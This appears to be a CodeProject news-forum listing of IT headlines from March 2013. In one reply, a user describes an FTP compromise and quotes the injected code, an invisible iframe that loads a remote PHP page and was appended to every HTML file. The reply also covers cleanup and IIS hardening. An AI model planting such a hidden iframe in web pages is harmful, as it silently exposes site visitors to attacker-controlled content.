Click here to Skip to main content
15,887,214 members

The Insider News

   

The Insider News is for breaking IT and Software development news. Post your news, your alerts and your inside scoops. This is an IT news-only forum - all off-topic, non-news posts will be removed. If you wish to ask a programming question please post it here.

Get The Daily Insider direct to your mailbox every day. Subscribe now!

 
NewsHappy Birthday, Objective-C! Pin
Terrence Dorsey7-Mar-13 9:01
sitebuilderTerrence Dorsey7-Mar-13 9:01 
NewsTruly Ergonomic Computer Keyboard Review: One Month with the TECK Pin
Terrence Dorsey7-Mar-13 9:01
sitebuilderTerrence Dorsey7-Mar-13 9:01 
GeneralRe: Truly Ergonomic Computer Keyboard Review: One Month with the TECK Pin
LloydA1117-Mar-13 9:14
LloydA1117-Mar-13 9:14 
NewsAs Intel knocks on ARM's door, what is the future of Windows RT? Pin
Terrence Dorsey7-Mar-13 9:00
sitebuilderTerrence Dorsey7-Mar-13 9:00 
NewsTwitter API v1 Retired / Creator Abandons Twitterizer Pin
AspDotNetDev6-Mar-13 19:59
protectorAspDotNetDev6-Mar-13 19:59 
NewsCourt rules Kim Dotcom can sue New Zealand spy agency Pin
John Isaiah Carmona6-Mar-13 17:44
John Isaiah Carmona6-Mar-13 17:44 
NewsSecurity Code Review Techniques: Cross-Site Scripting Edition Pin
Terrence Dorsey6-Mar-13 11:20
sitebuilderTerrence Dorsey6-Mar-13 11:20 
GeneralRe: Security Code Review Techniques: Cross-Site Scripting Edition Pin
kmoorevs7-Mar-13 5:47
kmoorevs7-Mar-13 5:47 
Interesting timing for this article. I have spent the last two days recovering from one of these attacks. One of my FTP accounts was compromised and the result was this appended to any html file:

<iframe src="http://nymannmadsen.dk/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>


They also left me with a new counter.php file and reference to others that were automatically deleted.

The iframe was very sneaky indeed. Agent Ransack found references to the address in my temporary internet files. Two of the pesky buggers refused to be deleted since they were 'in use' by IE... OMG | :OMG: but I had no browser running?..or did I? Process Monitor showed two instances of IE running...ahh, the invisible iframes where I had unwittingly opened infected pages from the day before, when I knew there was a problem. I killed the processes and 86'd the offending files.

I have since changed the password on the compromised ftp account and added some extra security measures in IIS to mitigate future attacks. (Dynamic IP Restrictions and Request Filtering)
"Go forth into the source" - Neal Morse

GeneralRe: Security Code Review Techniques: Cross-Site Scripting Edition Pin
Brisingr Aerowing8-Mar-13 10:57
professionalBrisingr Aerowing8-Mar-13 10:57 
NewsComparing the Impact and XNA gaming frameworks Pin
Terrence Dorsey6-Mar-13 11:20
sitebuilderTerrence Dorsey6-Mar-13 11:20 
NewsWebKit and the Render Wars Pin
Terrence Dorsey6-Mar-13 11:19
sitebuilderTerrence Dorsey6-Mar-13 11:19 
NewsUsing bitmap indexes in databases Pin
Terrence Dorsey6-Mar-13 11:19
sitebuilderTerrence Dorsey6-Mar-13 11:19 
NewsThe A Element Is Broken - HTML's Black Sheep Pin
Terrence Dorsey6-Mar-13 11:19
sitebuilderTerrence Dorsey6-Mar-13 11:19 
NewsHow two volunteers built the Raspberry Pi’s operating system Pin
Terrence Dorsey6-Mar-13 10:16
sitebuilderTerrence Dorsey6-Mar-13 10:16 
NewsKids, don’t believe the startup hype: Why you should join a big company first Pin
Terrence Dorsey6-Mar-13 10:15
sitebuilderTerrence Dorsey6-Mar-13 10:15 
NewsThe History of the Set-Top Box: From Bunny Ears to Apple TV Pin
Terrence Dorsey6-Mar-13 10:15
sitebuilderTerrence Dorsey6-Mar-13 10:15 
NewsThe secret origins of Google's Chrome OS Pin
Terrence Dorsey6-Mar-13 10:15
sitebuilderTerrence Dorsey6-Mar-13 10:15 
NewsMicrosoft: An expensive (IE) error Pin
Terrence Dorsey6-Mar-13 10:14
sitebuilderTerrence Dorsey6-Mar-13 10:14 
NewsThou shalt not Facebook Pin
Kent Sharkey6-Mar-13 8:01
staffKent Sharkey6-Mar-13 8:01 
NewsjQuery 2.0 (beta 2) Pin
Kent Sharkey5-Mar-13 11:06
staffKent Sharkey5-Mar-13 11:06 
GeneralRe: jQuery 2.0 (beta 2) Pin
AspDotNetDev5-Mar-13 12:52
protectorAspDotNetDev5-Mar-13 12:52 
GeneralRe: jQuery 2.0 (beta 2) Pin
Kent Sharkey5-Mar-13 13:01
staffKent Sharkey5-Mar-13 13:01 
GeneralRe: jQuery 2.0 (beta 2) Pin
Dan Neely7-Mar-13 5:33
Dan Neely7-Mar-13 5:33 
NewsConsumer versus Enterprise strategy at Microsoft Pin
Terrence Dorsey5-Mar-13 11:03
sitebuilderTerrence Dorsey5-Mar-13 11:03 
NewsWhy Haskell Is Worth Learning Pin
Terrence Dorsey5-Mar-13 11:03
sitebuilderTerrence Dorsey5-Mar-13 11:03 

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Praise Praise    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.